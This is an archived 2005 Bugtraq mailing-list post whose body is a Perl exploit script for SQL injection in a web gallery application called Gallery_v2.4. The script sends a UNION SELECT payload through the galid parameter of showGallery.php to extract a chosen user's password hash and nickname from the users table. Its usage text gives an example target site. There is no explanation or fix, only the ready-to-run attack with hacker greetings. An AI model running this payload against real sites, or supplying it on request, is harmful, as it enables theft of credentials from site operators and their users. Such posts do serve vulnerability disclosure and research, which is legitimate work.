Gallery_v2.4 SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Gallery_v2.4 SQL Injection
From: abducter_minds@xxxxxxxxx
Date: 4 Nov 2005 15:29:21 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#!/bin/env perl
#------------------------------------------------------------#
#-      Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS@xxxxxx) OR 
(ABDUCTER_MINDS@xxxxxxxxx)
#-      [!]     ==|| Gallery_v2.4 SQL Injection ||==
#-              Gr33tz :-                                                       
       
#-                      N0N0 (MY LOVE)                                          
                                                                         
#-                      WWW.S4A.CC  
#-                      Devil-00               
#-                      FOR ALL ARABIAN COUNTRIES                               
                                                                                
          
#------------------------------------------------------------#
use LWP::Simple;

print "\n\n==========================================\n";
print "\n= Exploit for Gallery_v2.4                    ";
print "\n=   BY    |(ABDUCTER_MINDS[at]YAHOO.COM)|     ";                       
        
print "\n=             FOR ALL ARAB WWW.S4A.CC         ";                       
print "\n============================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
  print "\n==|| Warning ABDUCTER Behind U ||==";        
  print "\nUsage:\nperl $0 [host+script]\n\nExample:\nperl $0 
http://tonioc.free.fr/gallery/ 1\n";
  exit(0);
}
$url = 
"/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,nick,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of 
password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

Prev by Date: Zoomblog HTML Injection Vulnerability
Next by Date: EUSecWest/London Call for Papers and PacSec/Tokyo announcements
Previous by thread: Re: Zoomblog HTML Injection Vulnerability
Next by thread: EUSecWest/London Call for Papers and PacSec/Tokyo announcements
Index(es):
- Date
- Thread